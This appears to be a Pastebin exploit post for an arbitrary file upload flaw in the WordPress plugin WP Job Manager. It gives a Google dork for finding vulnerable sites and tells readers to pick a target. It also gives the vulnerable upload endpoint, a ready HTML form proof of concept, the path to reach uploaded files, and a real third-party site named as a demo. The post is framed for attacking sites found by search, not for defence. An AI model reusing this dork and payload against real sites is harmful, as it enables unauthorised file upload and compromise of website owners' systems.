Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##################################################JokerSecurity#########################################################
- # Title : WordPress Plugins WP Job Manager - Arbitrary File Upload
- # Dork : inurl:/wp-content/plugins/wp-job-manager/
- # Tested on: [ BlackBuntu ]
- # MyChannel Youtube : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
- # Myblog : http://kader-information.blogspot.com/
- ######################
- # [+] DESCRIPTION :
- ######################
- # 1: Search Google Dork and Choose a Target
- #2 Exploit :
- ========
- https://localhost/jm-ajax/upload_file/
- Vulnerability :
- =======
- FormCraft {"files":[]}
- 3 PoC :
- ====
- <form method="POST" action="https://localhost/jm-ajax/upload_file/" enctype="multipart/form-data">
- <input type="file" name="files[]" />
- <button>Upload!</button><br/>
- </form>
- 4 : Upload Your File -=-=-=-=-=- File.jpg
- 5 : File Access : https://localhost/wp-content/uploads/job-manager-uploads/files/YYYY/MM/your-files.jpg
- ######
- Demo :
- ######
- http://snuviktechnologies.com
- ######################
- subscribe for my channel and page in facebook
- # Website : http://dev-labs.co
- # My Blogger : http://kader-information.blogspot.com/
- # Page FacebOOk 1 : https://www.facebook.com/AnonymousPalestine.vip
- # Page Facebook 2 : http://facebook.com/kali.linux.pentesting.tutorials/
- By <3
- ##################################################JokerSecurity#########################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement